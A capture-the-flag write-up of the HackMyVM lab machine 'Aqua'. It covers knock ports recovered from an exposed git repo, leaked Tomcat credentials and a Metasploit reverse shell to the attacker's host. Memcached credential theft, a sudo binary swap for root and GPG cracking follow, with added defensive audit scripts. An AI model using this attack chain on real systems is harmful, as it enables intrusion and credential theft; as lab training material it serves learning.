HackMyVM Aqua
Aqua by H1dr0 is classed as a medium difficulty machine by the author, but there are quite a few steps you need to take to get the initial foothold.
Find it
┌──(kali㉿kali)-[~/aqua]
└─$ sudo netdiscover -r 10.0.0.0/24 -P | tee findit
[sudo] password for kali:
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.0.0.1 08:00:27:4d:be:20 1 60 PCS Systemtechnik GmbH
10.0.0.53 08:00:27:8b:53:11 1 60 PCS Systemtechnik GmbH
-- Active scan completed, 2 Hosts found.
Enumerate it
┌──(kali㉿kali)-[~/aqua]
└─$ nmap -T4 -p- -sC -sV -oN nmap.out 10.0.0.53
Starting Nmap 7.91 ( https://nmap.org ) at Fri Mar 18 06:49:52 2022 EDT
Nmap scan report for 10.0.0.53
Host is up (0.00038s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 00:11:32:04:42:e0:7f:98:29:7c:1c:2a:b8:a7:b0:4a (RSA)
| 256 9c:92:93:eb:1c:8f:84:c8:73:af:ed:3b:65:09:e4:89 (ECDSA)
|_ 256 a8:5b:df:d0:7e:31:18:6e:57:e7:dd:6b:d5:89:44:98 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Todo sobre el Agua
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/8.5.5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.07 seconds
┌──(kali㉿kali)-[~/aqua]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://10.0.0.53 -x txt,php -t 10 -o 80.out -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.0.0.53
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,php
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
2022/03/19 17:29:16 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 200) [Size: 929]
/css (Status: 200) [Size: 926]
/robots.txt (Status: 200) [Size: 33]
/server-status (Status: 403) [Size: 274]
===============================================================
┌──(kali㉿kali)-[~/aqua]
└─$ curl http://10.0.0.53/robots.txt
User-Agent: *
Disalow: /SuperCMS
┌──(kali㉿kali)-[~/aqua]
└─$ nikto -h http://10.0.0.53/SuperCMS
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.0.0.53
+ Target Hostname: 10.0.0.53
+ Target Port: 80
+ Start Time: 2022-03-20 17:59:38 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /SuperCMS/, inode: 31f, size: 5cd741201fdee, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ OSVDB-3268: /SuperCMS/css/: Directory indexing found.
+ OSVDB-3092: /SuperCMS/css/: This might be interesting...
+ OSVDB-3268: /SuperCMS/img/: Directory indexing found.
+ OSVDB-3092: /SuperCMS/img/: This might be interesting...
+ /SuperCMS/login.html: Admin login page/section found.
+ OSVDB-3092: /SuperCMS/.git/index: Git Index file may contain directory listing information.
+ /SuperCMS/.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /SuperCMS/.git/config: Git config file found. Infos about repo details may be present.
+ 7889 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2022-03-20 18:00:39 (GMT-4) (61 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
So there is a git repo that may be worth looking at; I used GitTools to clone it:
https://github.com/internetwache/GitTools
After lots of messing about with git I eventually got it to work....
git log extract:
commit 58afe63a1cd28fa167b95bcff50d2f6f011337c1
Author: aquilino <hidro23@hotmail.com>
Date: Thu Jun 17 12:59:05 2021 +0200
Create knocking_on_Atlantis_door.txt
Las Puertas del avismo
┌──(kali㉿kali)-[~/aqua]
└─$ git show $(git rev-list --max-count=1 --all -- knocking_on_Atlantis_door.txt)^:knocking_on_Atlantis_door.txt
Para abrir las puertas esta es la secuencia
(☞゚ヮ゚)☞ 1100,800,666 ☜(゚ヮ゚☜)
Para abrir las puertas esta es la secuencia = To open the doors this is the sequence
It is also worth pointing out that nmap scans ports in a random order by default, so for a 3-port sequence there is actually a 1 in 6 chance of hitting the ports in the correct order by chance! So I may explore that as a potential tool at some point!
┌──(kali㉿kali)-[~/aqua]
└─$ knock 10.0.0.53 1100 800 666 -v
hitting tcp 10.0.0.53:1100
hitting tcp 10.0.0.53:800
hitting tcp 10.0.0.53:666
┌──(kali㉿kali)-[~/aqua]
└─$ nmap -T4 -p 21 10.0.0.53
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-20 18:01 EDT
Nmap scan report for 10.0.0.53
Host is up (0.00060s latency).
PORT STATE SERVICE
21/tcp open ftp
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
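To check the 1-in-6 remark above, here is an added simulation (not part of the original writeup) of a knockd-style sequence matcher. It assumes knockd advances on a hit to the next expected port and resets the attempt on any other port (a hit on the first port restarts it), and it ignores knockd's per-sequence timeout.

```python
from itertools import permutations

# Knock sequence from knocking_on_Atlantis_door.txt on the page.
KNOCK_SEQUENCE = (1100, 800, 666)


def knock_matcher(sequence):
    """Build a knockd-style matcher: each call takes one TCP hit and returns
    True when it completes the sequence.  Assumed knockd behaviour: a hit on
    the next expected port advances, any other port resets the attempt (a
    hit on the first port restarts it); per-sequence timeouts are ignored."""
    pos = 0

    def hit(port):
        nonlocal pos
        if port == sequence[pos]:
            pos += 1
            if pos == len(sequence):
                pos = 0
                return True
        else:
            pos = 1 if port == sequence[0] else 0
        return False

    return hit


def door_opens(sequence, hits):
    """True if sending `hits` in this order completes `sequence`."""
    hit = knock_matcher(sequence)
    return any(hit(p) for p in hits)


def random_order_odds(sequence):
    """(successful orderings, total orderings) when exactly the knock ports
    are probed in a uniformly random order, as nmap does by default."""
    orders = list(permutations(sequence))
    return sum(door_opens(sequence, o) for o in orders), len(orders)


if __name__ == "__main__":
    print(door_opens(KNOCK_SEQUENCE, [1100, 800, 666]))        # True
    print(door_opens(KNOCK_SEQUENCE, [1100, 22, 800, 666]))    # False: 22 resets it
    print(random_order_odds(KNOCK_SEQUENCE))                   # (1, 6)
```

The 1-in-6 odds only hold for a scan restricted to exactly those three ports; in a full -p- scan the hits on other ports in between reset the attempt, which is why an ordinary port scan almost never opens a knock-protected service by accident.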
So there is a hidden FTP service with anonymous access, from which a zip file, backup.zip, can be downloaded.
This however is password protected, and the password is not in rockyou.txt, so there must be a hint to find.
Some base64 text is hidden in an HTML comment at the end of the homepage:
<!-- MT0yID0gcGFzc3dvcmRfemlwCg== -->
┌──(kali㉿kali)-[~/aqua]
└─$ echo 'MT0yID0gcGFzc3dvcmRfemlwCg=='|base64 -d
1=2 = password_zip
1=2 = password_zip. Well, that's not exactly clear on its own, but there is something on the homepage that fits the pattern and gives the zip password:
┌──(kali㉿kali)-[~/aqua]
└─$ 7z x backup.zip -aoa -pagua=H2O
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-3740QM CPU @ 2.70GHz (306A9),ASM,AES-NI)
Scanning the drive for archives:
1 file, 1250 bytes (2 KiB)
Extracting archive: backup.zip
--
Path = backup.zip
Type = zip
Physical Size = 1250
Everything is Ok
Size: 2326
Compressed: 1250
And we find a backup of tomcat-users.xml that contains the admin credentials for Tomcat on port 8080:
<user username="aquaMan" password="P4st#####" roles="manager-gui,admin-gui"/>
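The leaked backup is dangerous because the account holds manager-gui/admin-gui, which is all the Tomcat manager needs to deploy a WAR. Below is an added audit script (not from the writeup or from Tomcat) that flags exactly that in a tomcat-users.xml: privileged roles and passwords stored in clear text. It assumes Tomcat's MessageDigestCredentialHandler output form salt$iterations$digest for hashed passwords, and the sample XML is constructed with a placeholder password.

```python
import re
import xml.etree.ElementTree as ET

# Roles that let a holder deploy WARs or reconfigure the server.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}

# Tomcat's MessageDigestCredentialHandler stores salt$iterations$digest in
# hex (assumed format); anything else is treated as clear text here.
DIGEST_RE = re.compile(r"^[0-9a-fA-F]*\$\d+\$[0-9a-fA-F]+$")

# Constructed sample in the shape of the backup on the page; the aquaMan
# password is a placeholder, not the real value.
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="aquaMan" password="PLACEHOLDER" roles="manager-gui,admin-gui"/>
  <user username="viewer" password="aa11$1$bb22" roles="tomcat"/>
</tomcat-users>
"""


def audit_tomcat_users(xml_text):
    """Return [(username, [issues])] for users a reviewer should look at."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if el.tag.split("}")[-1] != "user":      # drop the XML namespace
            continue
        name = el.get("username") or el.get("name") or "?"
        roles = {r.strip() for r in (el.get("roles") or "").split(",")} - {""}
        password = el.get("password") or ""
        issues = []
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if privileged:
            issues.append("privileged roles: " + ",".join(privileged))
        if password and not DIGEST_RE.match(password):
            issues.append("plaintext password")
        if issues:
            findings.append((name, issues))
    return findings


if __name__ == "__main__":
    for name, issues in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(name, "->", "; ".join(issues))
```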
Getting Shell
This is a bit harder to screenshot, so I may resort to just listing the commands... I used msfconsole.
└─$ msfconsole
=[ metasploit v6.1.4-dev ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
msf6 > use exploit/multi/http/tomcat_mgr_upload
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername aquaMan
HttpUsername => aquaMan
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword P4st****
HttpPassword => P4st3####
msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOST 10.0.0.53
RHOST => 10.0.0.53
msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > set LHOST 10.0.0.10
LHOST => 10.0.0.10
msf6 exploit(multi/http/tomcat_mgr_upload) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline
4 payload/java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline
5 payload/java/meterpreter/bind_tcp normal No Java Meterpreter, Java Bind TCP Stager
6 payload/java/meterpreter/reverse_http normal No Java Meterpreter, Java Reverse HTTP Stager
7 payload/java/meterpreter/reverse_https normal No Java Meterpreter, Java Reverse HTTPS Stager
8 payload/java/meterpreter/reverse_tcp normal No Java Meterpreter, Java Reverse TCP Stager
9 payload/java/shell/bind_tcp normal No Command Shell, Java Bind TCP Stager
10 payload/java/shell/reverse_tcp normal No Command Shell, Java Reverse TCP Stager
11 payload/java/shell_reverse_tcp normal No Java Command Shell, Reverse TCP Inline
12 payload/multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
13 payload/multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
msf6 exploit(multi/http/tomcat_mgr_upload) > set payload payload/java/shell_reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > show options
Module options (exploit/multi/http/tomcat_mgr_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword P4st3lM4n no The password for the specified username
HttpUsername aquaMan no The username to authenticate as
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.0.53 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used)
VHOST no HTTP server virtual host
Payload options (java/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.0.10 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Java Universal
msf6 exploit(multi/http/tomcat_mgr_upload) > run
[*] Started reverse TCP handler on 10.0.0.10:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying BAjJ3Mp3l9LRnlG6AWvZHQ...
[*] Executing BAjJ3Mp3l9LRnlG6AWvZHQ...
[*] Undeploying BAjJ3Mp3l9LRnlG6AWvZHQ ...
[*] Command shell session 1 opened (10.0.0.10:4444 -> 10.0.0.53:40772) at 2022-03-21 17:09:44 -0400
id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
hostname
Atlantis
Escalate to User
Linpeas is your friend on Aqua...
After quite a bit of looking around on my own, linpeas.sh turned up a few clues; I am only showing the relevant parts of the output.
As there is a memcached service running locally on port 11211, it is easy enough to just telnet to it and have a look. I have coloured the typed commands in green for readability (the colour does not survive in this text version: the typed commands are the stats items, stats cachedump 1 100 and get lines).
telnet localhost 11211
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
stats items
STAT items:1:number 5
STAT items:1:number_hot 1
STAT items:1:number_warm 0
STAT items:1:number_cold 4
STAT items:1:age_hot 0
STAT items:1:age_warm 0
STAT items:1:age 0
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:evicted_active 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 440
STAT items:1:lrutail_reflocked 0
STAT items:1:moves_to_cold 1162902
STAT items:1:moves_to_warm 0
STAT items:1:moves_within_lru 0
STAT items:1:direct_reclaims 0
STAT items:1:hits_to_hot 1
STAT items:1:hits_to_warm 0
STAT items:1:hits_to_cold 7
STAT items:1:hits_to_temp 0
END
stats cachedump 1 100
ITEM id [4 b; 0 s]
ITEM email [17 b; 0 s]
ITEM Name [14 b; 0 s]
ITEM password [18 b; 0 s]
ITEM username [8 b; 0 s]
END
get id
VALUE id 0 4
1221
END
get username
VALUE username 0 8
tridente
END
get password
VALUE password 0 18
N3ptun########
END
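The session above shows why an unauthenticated memcached is a finding even when bound to localhost: anything that can open a local socket can list slabs and read values in clear. As an added example (not from the writeup), the parser below handles the two memcached text-protocol replies used above, ITEM lines from stats cachedump and byte-counted VALUE blocks from get, and flags key names that look like credentials. The replies are constructed in the shape of the page's session with the password replaced by a placeholder, and the sensitive-name heuristic is an assumption.

```python
import re

# Key names that suggest a secret is being cached (assumed heuristic).
SENSITIVE_KEY = re.compile(r"pass|pwd|secret|token|session|key", re.I)

# Constructed replies in the shape of the page's telnet session; the real
# password is replaced by a placeholder and a multi-line value is added to
# exercise the byte-counted parsing.
CACHEDUMP_REPLY = (b"ITEM id [4 b; 0 s]\r\nITEM email [17 b; 0 s]\r\n"
                   b"ITEM Name [14 b; 0 s]\r\nITEM password [18 b; 0 s]\r\n"
                   b"ITEM username [8 b; 0 s]\r\nEND\r\n")
GET_REPLY = (b"VALUE id 0 4\r\n1221\r\n"
             b"VALUE password 0 18\r\nPLACEHOLDER_SECRET\r\n"
             b"VALUE note 0 9\r\nline1\r\nl2\r\nEND\r\n")


def parse_cachedump(reply):
    """Parse `stats cachedump <slab> <limit>` into [(key, bytes, expiry_s)]."""
    items = []
    for line in reply.split(b"\r\n"):
        m = re.match(rb"ITEM (\S+) \[(\d+) b; (\d+) s\]$", line)
        if m:
            items.append((m[1].decode(), int(m[2]), int(m[3])))
    return items


def parse_get(reply):
    """Parse a `get` reply into {key: value_bytes}.  Each value is read by
    the byte count in its VALUE header, so data containing CRLF stays intact."""
    values, pos = {}, 0
    while True:
        end = reply.index(b"\r\n", pos)
        header = reply[pos:end].split(b" ")
        if header[0] == b"END":
            return values
        key, nbytes = header[1].decode(), int(header[3])
        start = end + 2
        values[key] = reply[start:start + nbytes]
        pos = start + nbytes + 2            # skip the value's trailing CRLF


def sensitive_keys(items):
    """Keys from a cachedump listing whose names look like credentials."""
    return [key for key, _, _ in items if SENSITIVE_KEY.search(key)]


if __name__ == "__main__":
    items = parse_cachedump(CACHEDUMP_REPLY)
    print(sensitive_keys(items))                 # ['password']
    print(parse_get(GET_REPLY)["note"])          # b'line1\r\nl2'
```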
Escalate to Root
tridente@Atlantis:~$ sudo -l
[sudo] password for tridente:
Matching Defaults entries for tridente on Atlantis:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tridente may run the following commands on Atlantis:
(root) /home/tridente/find
tridente@Atlantis:~$ rm find
tridente@Atlantis:~$ cp /bin/bash ./find
tridente@Atlantis:~$ sudo /home/tridente/find -p
root@Atlantis:~#
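The rule lets tridente run /home/tridente/find as root, and since tridente owns that path the binary can be swapped for anything, which is exactly what happened above. The added checker below (not from the writeup) parses sudo -l style output and flags rules whose command lives in the invoking user's home or outside root-owned system directories, plus NOPASSWD tags. The trusted directory list is an assumption for a stock Ubuntu install, and the NOPASSWD rule in the sample is constructed; the page's own sudo -l had only the find rule.

```python
import re
from pathlib import PurePosixPath

# The rule from the page's `sudo -l`, plus one constructed NOPASSWD rule
# so that both checks fire.
SUDO_L_OUTPUT = """User tridente may run the following commands on Atlantis:
    (root) /home/tridente/find
    (root) NOPASSWD: /usr/bin/systemctl status apache2
"""

# Root-owned directories on a stock Ubuntu install (assumption for this check).
TRUSTED_DIRS = {"/bin", "/sbin", "/usr/bin", "/usr/sbin",
                "/usr/local/bin", "/usr/local/sbin", "/snap/bin"}

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

def parse_sudo_rules(text):
    """Return [(runas, [tags], command)] for each rule under the 'may run' header."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            tags = [t for t in m["tags"].replace(" ", "").split(":") if t]
            rules.append((m["runas"].strip(), tags, m["cmd"].strip()))
    return rules

def audit_sudo_rules(text, user_home):
    """Flag rules whose target the invoking user can replace, plus NOPASSWD."""
    findings, home = [], user_home.rstrip("/") + "/"
    for runas, tags, cmd in parse_sudo_rules(text):
        path, issues = PurePosixPath(cmd.split()[0]), []
        if cmd == "ALL":
            issues.append("ALL commands")
        elif str(path).startswith(home):
            issues.append("command inside the user's own home")
        elif str(path.parent) not in TRUSTED_DIRS:
            issues.append("command outside trusted system directories")
        if "NOPASSWD" in tags:
            issues.append("NOPASSWD")
        if issues:
            findings.append((runas, cmd, issues))
    return findings

if __name__ == "__main__":
    for runas, cmd, issues in audit_sudo_rules(SUDO_L_OUTPUT, "/home/tridente"):
        print(f"({runas}) {cmd}: {'; '.join(issues)}")
```

The fix on a real host is to keep every sudo target in a root-owned directory (and root-owned itself), so the user granted the rule cannot replace it.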
Now we have root but can't read the root flag as it is GPG encrypted...
┌──(kali㉿kali)-[~/aqua]
└─$ gpg2john root.txt.gpg >gpghash
File root.txt.gpg
┌──(kali㉿kali)-[~/aqua]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt gpghash
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 41943040 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
arthur (?)
1g 0:00:03:04 DONE (2022-03-20 18:14) 0.005415g/s 7.755p/s 7.755c/s 7.755C/s arthur..12345a
Use the "--show" option to display all of the cracked passwords reliably
Session completed
So we just need to decrypt the file and get the flag:
root@Atlantis:/root# echo "arthur" | gpg --batch --passphrase-fd 0 --output root.txt --decrypt root.txt.gpg
gpg: WARNING: unsafe ownership on homedir '/home/tridente/.gnupg'
gpg: AES256 encrypted data
gpg: encrypted with 1 passphrase
root@Atlantis:/root# cat root.txt
Bien hecho Arthur eres el nuevo Rey de la Atlantida
flag -->###############################
Root acquired and flags collected.